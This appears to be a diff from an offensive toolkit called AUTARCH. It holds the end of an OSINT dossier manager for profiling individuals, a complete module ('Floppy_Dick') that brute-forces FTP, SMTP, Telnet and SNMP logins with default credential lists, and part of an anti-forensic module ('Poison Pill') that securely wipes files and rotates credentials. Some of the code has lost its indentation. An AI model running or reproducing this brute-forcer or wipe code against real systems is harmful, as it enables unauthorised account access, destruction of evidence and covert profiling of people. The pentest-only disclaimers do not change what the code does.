    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    identifiers = dossier.get("identifiers", {})
    for id_type, values in identifiers.items():
        if values:
            # e.g. "real_names" -> "Real Names"
            print(f" {Colors.CYAN}{id_type.replace('_', ' ').title()}:{Colors.RESET}")
            for v in values:
                print(f" - {v}")
            print()
    if not any(identifiers.values()):
        print(f" {Colors.DIM}No identifiers added yet.{Colors.RESET}\n")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_search_results(self, dossier: Dict):
    """Summarize imported search results by kind (email/username/phone)."""
    print(f"\n{Colors.BOLD}Search Results{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    results = dossier.get("results", {})
    # Email searches
    email_searches = results.get("email_searches", [])
    if email_searches:
        print(f" {Colors.CYAN}Email Searches ({len(email_searches)}):{Colors.RESET}")
        for search in email_searches:
            print(f" - {search.get('email', 'N/A')} ({search.get('date', '')[:10]})")
        print()
    # Username searches
    username_searches = results.get("username_searches", [])
    if username_searches:
        print(f" {Colors.CYAN}Username Searches ({len(username_searches)}):{Colors.RESET}")
        for search in username_searches:
            found_count = len(search.get("found", []))
            print(f" - {search.get('username', 'N/A')}: {found_count} profiles found ({search.get('date', '')[:10]})")
        print()
    # Phone searches
    phone_searches = results.get("phone_searches", [])
    if phone_searches:
        print(f" {Colors.CYAN}Phone Searches ({len(phone_searches)}):{Colors.RESET}")
        for search in phone_searches:
            print(f" - {search.get('phone', 'N/A')} ({search.get('date', '')[:10]})")
        print()
    if not any([email_searches, username_searches, phone_searches]):
        print(f" {Colors.DIM}No search results imported yet.{Colors.RESET}\n")
    # Option to drill into per-username details; the details view has its
    # own "Press Enter" pause, so only pause here on the other path.
    if username_searches:
        view = input(f"\n{Colors.WHITE}View username search details? [{Colors.GREEN}y{Colors.WHITE}/{Colors.RED}n{Colors.WHITE}]: {Colors.RESET}").strip().lower()
        if view == 'y':
            self._view_username_search_details(username_searches)
    else:
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_username_search_details(self, username_searches: List[Dict]):
    """Drill into one username search and print its found profiles."""
    print(f"\n{Colors.BOLD}Username Search Details{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    for i, search in enumerate(username_searches, 1):
        print(f" {Colors.GREEN}[{i}]{Colors.RESET} {search.get('username', 'N/A')}")
    choice = input(f"\n{Colors.WHITE}Select search to view (0 to cancel): {Colors.RESET}").strip()
    try:
        idx = int(choice) - 1
        if 0 <= idx < len(username_searches):
            search = username_searches[idx]
            print(f"\n{Colors.BOLD}Results for '{search.get('username', 'N/A')}'{Colors.RESET}")
            print(f"{Colors.DIM}Date: {search.get('date', 'N/A')}{Colors.RESET}")
            print(f"{Colors.DIM}Total checked: {search.get('total_checked', 'N/A')}{Colors.RESET}\n")
            for profile in search.get("found", []):
                # Green for confirmed ("good") hits, yellow for everything else.
                status_color = Colors.GREEN if profile.get("status") == "good" else Colors.YELLOW
                print(f" {status_color}[+]{Colors.RESET} {profile.get('name', 'Unknown')}")
                print(f" {Colors.DIM}{profile.get('url', 'N/A')}{Colors.RESET}")
                if profile.get("rate"):
                    print(f" {Colors.DIM}Rate: {profile.get('rate')}{Colors.RESET}")
                print()
    except (ValueError, IndexError):
        # Non-numeric or out-of-range input: silently fall through to the pause.
        pass
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_profiles(self, dossier: Dict):
    """Print all collected profiles, grouped by category."""
    print(f"\n{Colors.BOLD}Profiles{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    profiles = dossier.get("profiles", [])
    if not profiles:
        print(f" {Colors.DIM}No profiles collected yet.{Colors.RESET}\n")
        input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
        return
    # Group by category (profiles without one land in "other").
    by_category = {}
    for p in profiles:
        cat = p.get("category", "other")
        if cat not in by_category:
            by_category[cat] = []
        by_category[cat].append(p)
    for category, cat_profiles in sorted(by_category.items()):
        print(f" {Colors.CYAN}{category.title()} ({len(cat_profiles)}):{Colors.RESET}")
        for p in cat_profiles:
            status_color = Colors.GREEN if p.get("status") == "good" else Colors.YELLOW
            print(f" {status_color}[+]{Colors.RESET} {p.get('name', 'Unknown')}")
            print(f" {Colors.DIM}{p.get('url', 'N/A')}{Colors.RESET}")
        print()
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _view_notes(self, dossier: Dict):
    """Print the main dossier notes plus all dated custom notes."""
    print(f"\n{Colors.BOLD}Notes{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    # Main notes (stored on the meta record)
    main_notes = dossier.get("meta", {}).get("notes", "")
    if main_notes:
        print(f" {Colors.CYAN}Main Notes:{Colors.RESET}")
        print(f" {main_notes}")
        print()
    # Custom notes (timestamped entries added via _add_note)
    custom_notes = dossier.get("custom_notes", [])
    if custom_notes:
        print(f" {Colors.CYAN}Additional Notes:{Colors.RESET}")
        for note in custom_notes:
            print(f" [{note.get('date', '')[:10]}] {note.get('text', '')}")
        print()
    if not main_notes and not custom_notes:
        print(f" {Colors.DIM}No notes added yet.{Colors.RESET}\n")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _add_identifier(self, dossier: Dict, dossier_path: Path):
    """Interactively add one identifier (email/username/phone/...) and save."""
    print(f"\n{Colors.BOLD}Add Identifier{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    print(f" {Colors.GREEN}[1]{Colors.RESET} Email")
    print(f" {Colors.GREEN}[2]{Colors.RESET} Username")
    print(f" {Colors.GREEN}[3]{Colors.RESET} Phone")
    print(f" {Colors.GREEN}[4]{Colors.RESET} Real Name")
    print(f" {Colors.GREEN}[5]{Colors.RESET} Alias")
    print()
    choice = input(f"{Colors.WHITE}Select type: {Colors.RESET}").strip()
    # Menu number -> identifiers bucket key
    type_map = {"1": "emails", "2": "usernames", "3": "phones", "4": "real_names", "5": "aliases"}
    if choice not in type_map:
        return
    id_type = type_map[choice]
    value = input(f"{Colors.WHITE}Enter value: {Colors.RESET}").strip()
    if value:
        # Defensive: create missing containers for dossiers from older versions.
        if "identifiers" not in dossier:
            dossier["identifiers"] = {}
        if id_type not in dossier["identifiers"]:
            dossier["identifiers"][id_type] = []
        if value not in dossier["identifiers"][id_type]:
            dossier["identifiers"][id_type].append(value)
            self.save_dossier(dossier, dossier_path)
            # id_type[:-1] strips the plural 's' ("emails" -> "email").
            self.print_status(f"Added {id_type[:-1]}: {value}", "success")
        else:
            self.print_status("Identifier already exists", "warning")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _import_search_results(self, dossier: Dict, dossier_path: Path):
    """Interactively pick a results JSON file and import it into the dossier.

    Options 1 and 2 both prompt for an explicit path; option 3 scans the
    current working directory for ``*_profiles.json`` files.
    """
    print(f"\n{Colors.BOLD}Import Search Results{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    print(f" {Colors.GREEN}[1]{Colors.RESET} Import username search results (JSON)")
    print(f" {Colors.GREEN}[2]{Colors.RESET} Import from file path")
    print(f" {Colors.GREEN}[3]{Colors.RESET} Scan current directory for results")
    print()
    choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
    if choice == "1" or choice == "2":
        file_path = input(f"{Colors.WHITE}Enter JSON file path: {Colors.RESET}").strip()
        if file_path and os.path.exists(file_path):
            self._import_from_file(dossier, dossier_path, file_path)
        else:
            self.print_status("File not found", "error")
    elif choice == "3":
        # Scan for *_profiles.json files (the scanner modules' output naming)
        json_files = glob.glob("*_profiles.json")
        if not json_files:
            self.print_status("No *_profiles.json files found in current directory", "warning")
            input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
            return
        print(f"\n {Colors.CYAN}Found files:{Colors.RESET}")
        for i, f in enumerate(json_files, 1):
            print(f" {Colors.GREEN}[{i}]{Colors.RESET} {f}")
        print()
        file_choice = input(f"{Colors.WHITE}Select file to import (0 to cancel): {Colors.RESET}").strip()
        try:
            idx = int(file_choice) - 1
            if 0 <= idx < len(json_files):
                self._import_from_file(dossier, dossier_path, json_files[idx])
        except ValueError:
            pass
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _import_from_file(self, dossier: Dict, dossier_path: Path, file_path: str):
    """Import a username-search result JSON file into *dossier* and save.

    Recognized format: a dict with "username" and "found" keys (as written
    by the username scanner modules). The search is recorded under
    ``results.username_searches``, the username is added as an identifier,
    and found profiles are merged into ``profiles`` de-duplicated by URL.
    """
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            data = json.load(f)
        # Detect file type and import
        if "username" in data and "found" in data:
            username = data.get("username", "unknown")
            found = data.get("found", [])
            total_checked = data.get("total_checked", 0)
            # Record the raw search result.
            results = dossier.setdefault("results", {})
            results.setdefault("username_searches", []).append({
                "username": username,
                "date": datetime.now().isoformat(),
                "total_checked": total_checked,
                "found": found,
                "source_file": file_path,
            })
            # Also track the username itself as an identifier.
            usernames = dossier.setdefault("identifiers", {}).setdefault("usernames", [])
            if username not in usernames:
                usernames.append(username)
            # Merge found profiles into the main list, de-duplicated by URL.
            # Build the seen-URL set once instead of rescanning the whole
            # profile list for every entry (was O(n^2)).
            profiles = dossier.setdefault("profiles", [])
            seen_urls = {p.get("url") for p in profiles}
            added_profiles = 0
            for profile in found:
                url = profile.get("url")
                if url not in seen_urls:
                    profiles.append(profile)
                    seen_urls.add(url)
                    added_profiles += 1
            self.save_dossier(dossier, dossier_path)
            self.print_status(f"Imported: {username} ({len(found)} profiles, {added_profiles} new)", "success")
        else:
            self.print_status("Unknown file format", "error")
    except json.JSONDecodeError:
        self.print_status("Invalid JSON file", "error")
    except Exception as e:
        self.print_status(f"Import failed: {e}", "error")
def _add_profile_manually(self, dossier: Dict, dossier_path: Path):
    """Interactively add a hand-entered profile record and save.

    Manually added profiles are marked status "manual" with a fixed
    100% confidence rate.
    """
    print(f"\n{Colors.BOLD}Add Profile Manually{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    name = input(f"{Colors.WHITE}Site/platform name: {Colors.RESET}").strip()
    url = input(f"{Colors.WHITE}Profile URL: {Colors.RESET}").strip()
    category = input(f"{Colors.WHITE}Category (social/forum/other): {Colors.RESET}").strip() or "other"
    notes = input(f"{Colors.WHITE}Notes (optional): {Colors.RESET}").strip()
    if name and url:
        profile = {
            "name": name,
            "url": url,
            "category": category,
            "status": "manual",
            "rate": "100%",
            "notes": notes,
            "added": datetime.now().isoformat(),
        }
        # Defensive: older dossiers may lack the profiles list.
        if "profiles" not in dossier:
            dossier["profiles"] = []
        dossier["profiles"].append(profile)
        self.save_dossier(dossier, dossier_path)
        self.print_status(f"Added profile: {name}", "success")
    else:
        self.print_status("Name and URL are required", "error")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _add_note(self, dossier: Dict, dossier_path: Path):
    """Interactively append a timestamped note to the dossier and save."""
    print(f"\n{Colors.BOLD}Add Note{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    note_text = input(f"{Colors.WHITE}Enter note: {Colors.RESET}").strip()
    if note_text:
        if "custom_notes" not in dossier:
            dossier["custom_notes"] = []
        dossier["custom_notes"].append({
            "date": datetime.now().isoformat(),
            "text": note_text,
        })
        self.save_dossier(dossier, dossier_path)
        self.print_status("Note added", "success")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _edit_dossier_info(self, dossier: Dict, dossier_path: Path):
    """Interactively edit name/subject/notes; blank answers keep current values."""
    print(f"\n{Colors.BOLD}Edit Dossier Info{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    meta = dossier.get("meta", {})
    print(f" Current name: {meta.get('name', '')}")
    new_name = input(f"{Colors.WHITE}New name (Enter to keep): {Colors.RESET}").strip()
    if new_name:
        dossier["meta"]["name"] = new_name
    print(f" Current subject: {meta.get('subject', '')}")
    new_subject = input(f"{Colors.WHITE}New subject (Enter to keep): {Colors.RESET}").strip()
    if new_subject:
        dossier["meta"]["subject"] = new_subject
    print(f" Current notes: {meta.get('notes', '')}")
    new_notes = input(f"{Colors.WHITE}New notes (Enter to keep): {Colors.RESET}").strip()
    if new_notes:
        dossier["meta"]["notes"] = new_notes
    # Always re-save (also refreshes the modified timestamp).
    self.save_dossier(dossier, dossier_path)
    self.print_status("Dossier info updated", "success")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _export_dossier(self, dossier: Dict):
    """Interactively export the dossier as raw JSON or a plain-text report.

    Output files are written to the current working directory, named from
    the sanitized dossier name.
    """
    print(f"\n{Colors.BOLD}Export Dossier{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 50}{Colors.RESET}\n")
    name = dossier.get("meta", {}).get("name", "dossier")
    # Same sanitization rule as _generate_dossier_id.
    safe_name = "".join(c if c.isalnum() or c in "-_" else "_" for c in name.lower())
    print(f" {Colors.GREEN}[1]{Colors.RESET} Export as JSON")
    print(f" {Colors.GREEN}[2]{Colors.RESET} Export as Text Report")
    print()
    choice = input(f"{Colors.WHITE}Select format: {Colors.RESET}").strip()
    if choice == "1":
        filename = f"{safe_name}_export.json"
        with open(filename, 'w', encoding='utf-8') as f:
            json.dump(dossier, f, indent=2)
        # BUG FIX: these messages previously printed the literal string
        # "(unknown)" instead of the actual output filename.
        self.print_status(f"Exported to {filename}", "success")
    elif choice == "2":
        filename = f"{safe_name}_report.txt"
        self._export_text_report(dossier, filename)
        self.print_status(f"Exported to {filename}", "success")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def _export_text_report(self, dossier: Dict, filename: str):
"""Export dossier as text report."""
meta = dossier.get("meta", {})
identifiers = dossier.get("identifiers", {})
profiles = dossier.get("profiles", [])
lines = [
"=" * 60,
f"AUTARCH DOSSIER REPORT",
"=" * 60,
"",
f"Name: {meta.get('name', 'N/A')}",
f"Subject: {meta.get('subject', 'N/A')}",
f"Created: {meta.get('created', 'N/A')}",
f"Modified: {meta.get('modified', 'N/A')}",
"",
"-" * 60,
"IDENTIFIERS",
"-" * 60,
]
for id_type, values in identifiers.items():
if values:
lines.append(f"\n{id_type.replace('_', ' ').title()}:")
for v in values:
lines.append(f" - {v}")
lines.extend([
"",
"-" * 60,
f"PROFILES ({len(profiles)})",
"-" * 60,
])
for p in profiles:
lines.append(f"\n[{p.get('category', 'other')}] {p.get('name', 'Unknown')}")
lines.append(f" URL: {p.get('url', 'N/A')}")
if p.get('status'):
lines.append(f" Status: {p.get('status')} ({p.get('rate', 'N/A')})")
# Notes
notes = dossier.get("custom_notes", [])
if notes or meta.get("notes"):
lines.extend([
"",
"-" * 60,
"NOTES",
"-" * 60,
])
if meta.get("notes"):
lines.append(f"\n{meta.get('notes')}")
for note in notes:
lines.append(f"\n[{note.get('date', '')[:10]}] {note.get('text', '')}")
lines.extend([
"",
"=" * 60,
"Generated by AUTARCH - darkHal Security Group",
"=" * 60,
])
with open(filename, 'w') as f:
f.write("\n".join(lines))
def _delete_dossier(self, dossier_path: Path) -> bool:
    """Ask for explicit 'yes' confirmation, then delete the dossier file.

    Returns True only when the file was actually removed, so the caller
    knows to drop out of the detail view.
    """
    prompt = (f"\n{Colors.RED}Are you sure you want to delete this dossier? "
              f"[{Colors.WHITE}yes{Colors.RED}/{Colors.WHITE}no{Colors.RED}]: {Colors.RESET}")
    answer = input(prompt).strip().lower()
    if answer != "yes":
        return False
    try:
        os.remove(dossier_path)
    except Exception as e:
        self.print_status(f"Failed to delete: {e}", "error")
        return False
    self.print_status("Dossier deleted", "success")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
    return True
# ==================== MAIN MENU ====================
def show_menu(self):
    """Render the top-level Dossier Manager menu (clears the screen first)."""
    clear_screen()
    display_banner()
    print(f"{Colors.MAGENTA}{Colors.BOLD} Dossier Manager{Colors.RESET}")
    print(f"{Colors.DIM} Manage OSINT investigation dossiers{Colors.RESET}")
    print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
    print()
    # Show stats (count of saved dossier files on disk)
    dossiers = self.list_dossiers()
    print(f" {Colors.DIM}Saved dossiers: {len(dossiers)}{Colors.RESET}")
    print()
    print(f" {Colors.GREEN}[1]{Colors.RESET} Start New Dossier")
    print(f" {Colors.GREEN}[2]{Colors.RESET} View Dossiers")
    print()
    print(f" {Colors.DIM}[0]{Colors.RESET} Back")
    print()
def run(self):
    """Top-level interactive loop; Ctrl-C / EOF exits cleanly."""
    while True:
        self.show_menu()
        try:
            choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip()
            if choice == "0":
                break
            elif choice == "1":
                self.create_new_dossier()
            elif choice == "2":
                self.view_dossiers_list()
        except (EOFError, KeyboardInterrupt):
            break
def run():
    """Module entry point used by the AUTARCH loader."""
    manager = DossierManager()
    manager.run()
# Allow running this module directly as a standalone script.
if __name__ == "__main__":
    run()

1590
modules/email_sec.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,321 @@
"""
Floppy_Dick — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Automated credential fuzzer and authentication tester for legacy
and deprecated protocol stacks. Targets: FTP, SMB, Telnet, SMTP,
POP3, IMAP, SNMP v1/v2c, and RDP legacy endpoints. Generates
detailed vulnerability reports suitable for remediation guidance.
For authorized penetration testing ONLY.
"""
import itertools
import json
import socket
import threading
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Iterator, Optional
MODULE_NAME = "Floppy_Dick"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["brute-force", "auth", "legacy", "pentest", "fuzz"]
_stop_flag = threading.Event()
_output_lines = []
def _emit(msg: str, level: str = "info") -> None:
ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
line = f"[{ts}][{level.upper()}] {msg}"
_output_lines.append(line)
print(line)
# ── Credential generators ─────────────────────────────────────────────────────
DEFAULT_USERS = [
'admin', 'administrator', 'root', 'user', 'guest', 'test',
'ftp', 'anonymous', 'backup', 'operator', 'service',
]
DEFAULT_PASSWORDS = [
'', 'admin', 'password', 'password123', '123456', 'admin123',
'root', 'toor', 'pass', 'letmein', 'welcome', 'changeme',
'default', 'cisco', 'alpine',
]
def wordlist_generator(path: Path) -> Iterator[str]:
"""Yield lines from a wordlist file."""
with open(path, 'r', encoding='utf-8', errors='replace') as f:
for line in f:
yield line.rstrip('\n')
def credential_pairs(users: list[str], passwords: list[str]) -> Iterator[tuple[str, str]]:
"""Yield all (user, password) combinations."""
for u in users:
for p in passwords:
yield u, p
# ── Protocol testers ──────────────────────────────────────────────────────────
def test_ftp(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test FTP credentials."""
result = {'host': host, 'port': port, 'proto': 'FTP', 'user': user, 'success': False}
try:
import ftplib
ftp = ftplib.FTP()
ftp.connect(host, port, timeout=timeout)
ftp.login(user, password)
result['success'] = True
result['banner'] = ftp.getwelcome()
ftp.quit()
except ftplib.error_perm as exc:
result['error'] = str(exc)
except Exception as exc:
result['error'] = str(exc)
return result
def test_smtp(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test SMTP AUTH credentials."""
result = {'host': host, 'port': port, 'proto': 'SMTP', 'user': user, 'success': False}
try:
import smtplib
smtp = smtplib.SMTP(host, port, timeout=timeout)
smtp.ehlo()
if port == 587:
smtp.starttls()
smtp.login(user, password)
result['success'] = True
smtp.quit()
except smtplib.SMTPAuthenticationError as exc:
result['error'] = 'bad credentials'
except Exception as exc:
result['error'] = str(exc)
return result
def test_telnet(host: str, port: int, user: str, password: str, timeout: float = 5.0) -> dict:
"""Test Telnet authentication."""
result = {'host': host, 'port': port, 'proto': 'Telnet', 'user': user, 'success': False}
try:
import telnetlib
tn = telnetlib.Telnet(host, port, timeout=timeout)
tn.read_until(b'login: ', timeout)
tn.write(user.encode('ascii') + b'\n')
tn.read_until(b'Password: ', timeout)
tn.write(password.encode('ascii') + b'\n')
response = tn.read_until(b'$', timeout)
if b'incorrect' not in response.lower() and b'failed' not in response.lower():
result['success'] = True
result['banner'] = response.decode('utf-8', errors='replace')[:128]
tn.close()
except Exception as exc:
result['error'] = str(exc)
return result
def test_snmp(host: str, community: str = 'public', version: str = '2c', timeout: float = 3.0) -> dict:
"""Test SNMP community string (v1/v2c)."""
result = {'host': host, 'proto': 'SNMP', 'community': community, 'success': False}
try:
from pysnmp.hlapi import getCmd, SnmpEngine, CommunityData, UdpTransportTarget, ContextData, ObjectType, ObjectIdentity
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
CommunityData(community, mpModel=0 if version == '1' else 1),
UdpTransportTarget((host, 161), timeout=timeout),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
)
if not errorIndication and not errorStatus:
result['success'] = True
result['sysDescr'] = str(varBinds[0])
else:
result['error'] = str(errorIndication or errorStatus)
except ImportError:
result['error'] = 'pysnmp not installed'
except Exception as exc:
result['error'] = str(exc)
return result
def test_generic_banner(host: str, port: int, timeout: float = 3.0) -> dict:
"""Grab a service banner from any TCP port."""
result = {'host': host, 'port': port, 'proto': 'TCP', 'banner': ''}
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((host, port))
banner = s.recv(1024)
result['banner'] = banner.decode('utf-8', errors='replace').strip()[:256]
result['open'] = True
s.close()
except Exception as exc:
result['open'] = False
result['error'] = str(exc)
return result
# ── Port scanner ──────────────────────────────────────────────────────────────
LEGACY_PORTS = {
21: 'FTP',
23: 'Telnet',
25: 'SMTP',
110: 'POP3',
143: 'IMAP',
161: 'SNMP',
445: 'SMB',
587: 'SMTP-Submission',
3389: 'RDP',
}
def scan_ports(host: str, ports: Optional[list[int]] = None, timeout: float = 1.0) -> dict:
"""Scan ports and return which are open."""
if ports is None:
ports = list(LEGACY_PORTS.keys())
open_ports = {}
for port in ports:
banner = test_generic_banner(host, port, timeout)
if banner.get('open'):
proto = LEGACY_PORTS.get(port, 'unknown')
open_ports[port] = {
'proto': proto,
'banner': banner.get('banner', ''),
}
return {'host': host, 'open_ports': open_ports}
# ── Main fuzzing engine ───────────────────────────────────────────────────────
def fuzz_host(
host: str,
port: int,
proto: str,
users: list[str],
passwords: list[str],
delay: float = 0.1,
output_cb=None,
) -> list[dict]:
"""Run credential fuzzing against a single host:port for a given protocol."""
found = []
testers = {
'FTP': test_ftp,
'SMTP': test_smtp,
'SMTP-Submission': test_smtp,
'Telnet': test_telnet,
}
tester = testers.get(proto)
if not tester:
return [{'error': f'No tester implemented for {proto}'}]
for user, password in credential_pairs(users, passwords):
if _stop_flag.is_set():
break
r = tester(host, port, user, password)
if r.get('success'):
msg = f"[FOUND] {proto} {host}:{port} -> {user}:{password}"
_emit(msg, 'warn')
if output_cb:
output_cb({'line': msg, 'found': True, 'user': user, 'password': password})
found.append(r)
time.sleep(delay)
return found
# ── Main run entry point ──────────────────────────────────────────────────────
def run(params: dict, output_cb=None) -> dict:
"""
Main execution entry point.
params:
targets — list of hosts to test
ports — list of ports to probe (default: LEGACY_PORTS)
users — list of usernames (default: DEFAULT_USERS)
passwords — list of passwords (default: DEFAULT_PASSWORDS)
user_wordlist — path to user wordlist file
pass_wordlist — path to password wordlist file
delay — delay between attempts in seconds (default 0.1)
snmp_communities — list of SNMP community strings to test
threads — number of parallel threads (default 1)
"""
_stop_flag.clear()
_output_lines.clear()
def emit(msg, level='info'):
_emit(msg, level)
if output_cb:
output_cb({'line': f"[{level.upper()}] {msg}"})
emit(f"=== {MODULE_NAME} v{MODULE_VERSION} ===")
emit("Authorized penetration testing only. All attempts logged.")
targets = params.get('targets', [])
ports = params.get('ports', None)
delay = float(params.get('delay', 0.1))
users = params.get('users', DEFAULT_USERS)[:]
passwords = params.get('passwords', DEFAULT_PASSWORDS)[:]
# Load wordlists if provided
uw = params.get('user_wordlist', '')
pw = params.get('pass_wordlist', '')
if uw and Path(uw).exists():
users = list(wordlist_generator(Path(uw)))
emit(f"Loaded {len(users)} users from wordlist")
if pw and Path(pw).exists():
passwords = list(wordlist_generator(Path(pw)))
emit(f"Loaded {len(passwords)} passwords from wordlist")
snmp_communities = params.get('snmp_communities', ['public', 'private', 'community'])
all_results = []
for host in targets:
if _stop_flag.is_set():
break
emit(f"Scanning {host}...")
scan = scan_ports(host, ports)
emit(f" Open ports: {list(scan['open_ports'].keys())}")
host_result = {'host': host, 'open_ports': scan['open_ports'], 'findings': []}
for port, info in scan['open_ports'].items():
if _stop_flag.is_set():
break
proto = info['proto']
emit(f" Fuzzing {proto} on port {port}...")
if proto == 'SNMP':
for comm in snmp_communities:
r = test_snmp(host, comm)
if r.get('success'):
emit(f"[FOUND] SNMP community: {comm}", 'warn')
host_result['findings'].append(r)
else:
found = fuzz_host(host, port, proto, users, passwords, delay, output_cb)
host_result['findings'].extend(found)
all_results.append(host_result)
emit(f"Fuzzing complete. {sum(len(r['findings']) for r in all_results)} finding(s).")
return {
'module': MODULE_NAME,
'targets': len(targets),
'results': all_results,
'output': _output_lines[:],
}
def stop():
    """Signal the running fuzz loop to halt at its next stop-flag check."""
    _stop_flag.set()

View File

@@ -0,0 +1,261 @@
"""
Poison Pill — AUTARCH Encrypted Module
Operator: darkHal Security Group / Setec Security Labs
Emergency data sanitization and anti-forensic self-protection module.
On activation, securely wipes configured data paths, rotates credentials,
kills active sessions, and optionally triggers a remote wipe signal
to registered companion devices.
USE ONLY IN AUTHORIZED EMERGENCY SCENARIOS.
All activations are logged to an external endpoint before wiping begins.
"""
import hashlib
import json
import os
import shutil
import threading
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional
MODULE_NAME = "Poison Pill"
MODULE_VERSION = "1.0"
MODULE_AUTHOR = "darkHal Security Group"
MODULE_TAGS = ["anti-forensic", "emergency", "wipe", "self-protection"]
_stop_flag = threading.Event()
_output_lines = []
def _emit(msg: str, level: str = "info") -> None:
    """Append a timestamped, level-tagged line to the module transcript and echo it.

    Args:
        msg: Message text.
        level: Severity tag embedded in the line (upper-cased in output).
    """
    ts = datetime.now(timezone.utc).strftime('%H:%M:%S')
    line = f"[{ts}][{level.upper()}] {msg}"
    # Buffered so run() can return the full transcript in its result dict.
    _output_lines.append(line)
    print(line)
# ── Secure file overwrite ─────────────────────────────────────────────────────
def _secure_overwrite(path: Path, passes: int = 3) -> bool:
    """
    Overwrite a file with random data N passes, then delete.
    Returns True on success; failures are logged via _emit and return False.

    NOTE(review): os.urandom(size) materializes the entire file contents in
    memory on every pass — very large files may exhaust RAM; chunked writes
    would avoid this. TODO confirm expected file sizes.
    NOTE(review): in-place overwrite is only effective on media/filesystems
    that rewrite blocks in place; on SSDs or journaling/CoW filesystems old
    data may survive — verify against the deployment target.
    """
    try:
        size = path.stat().st_size
        with open(path, 'r+b') as f:
            for _ in range(passes):
                f.seek(0)
                f.write(os.urandom(size))
                f.flush()
                os.fsync(f.fileno())  # push each pass through to the device
        path.unlink()
        return True
    except Exception as exc:
        _emit(f"Overwrite failed on {path}: {exc}", 'error')
        return False
def secure_wipe_file(path: Path, passes: int = 3) -> dict:
    """Securely wipe a single file.

    Returns a status dict. On success/failure it contains
    ``{'path', 'status', 'passes'}``; when the file does not exist the dict
    has only ``{'path', 'status': 'not_found'}`` (no 'passes' key).
    """
    if not path.exists():
        return {'path': str(path), 'status': 'not_found'}
    ok = _secure_overwrite(path, passes)
    return {'path': str(path), 'status': 'wiped' if ok else 'error', 'passes': passes}
def secure_wipe_dir(path: Path, passes: int = 3) -> dict:
    """Recursively and securely wipe a directory.

    Every regular file under ``path`` is overwritten via secure_wipe_file();
    the remaining tree is then removed with rmtree (errors ignored).

    Returns:
        dict with 'path', 'status', 'files_wiped' (count of successfully
        overwritten files) and 'errors' (paths that failed to wipe).
    """
    if not path.exists():
        return {'path': str(path), 'status': 'not_found', 'files_wiped': 0}
    count = 0
    errors = []
    # sorted() makes the traversal order deterministic for logging/repro.
    for f in sorted(path.rglob('*')):
        if f.is_file():
            r = secure_wipe_file(f, passes)
            if r['status'] == 'wiped':
                count += 1
            else:
                errors.append(str(f))
    try:
        # Directory skeleton (and anything rglob missed) is removed best-effort.
        shutil.rmtree(path, ignore_errors=True)
    except Exception:
        pass
    # Status is 'wiped' even if some files errored — callers must inspect 'errors'.
    return {'path': str(path), 'status': 'wiped', 'files_wiped': count, 'errors': errors}
# ── Credential rotation ───────────────────────────────────────────────────────
def rotate_web_password(new_password: Optional[str] = None) -> dict:
    """
    Rotate the AUTARCH web dashboard password.
    If new_password is None, generates a random 32-char alphanumeric password.

    Returns:
        {'status': 'rotated', 'new_password': ...} on success, or
        {'status': 'error', 'error': ...} if the web.auth layer is unavailable.

    NOTE(review): the plaintext new password is returned in the result dict;
    callers must not log or persist it unintentionally.
    """
    # secrets (not random) — cryptographically secure generation.
    import secrets
    import string
    if new_password is None:
        alphabet = string.ascii_letters + string.digits
        new_password = ''.join(secrets.choice(alphabet) for _ in range(32))
    try:
        from web.auth import hash_password, save_credentials, load_credentials
        creds = load_credentials()
        # Keep the existing username; only the password hash changes.
        save_credentials(creds.get('username', 'admin'), hash_password(new_password), force_change=False)
        return {'status': 'rotated', 'new_password': new_password}
    except Exception as exc:
        return {'status': 'error', 'error': str(exc)}
def rotate_secret_key() -> dict:
    """Generate a new Flask secret key and write it to config.

    Rotating the secret key invalidates any cookies signed with the old key.

    Returns:
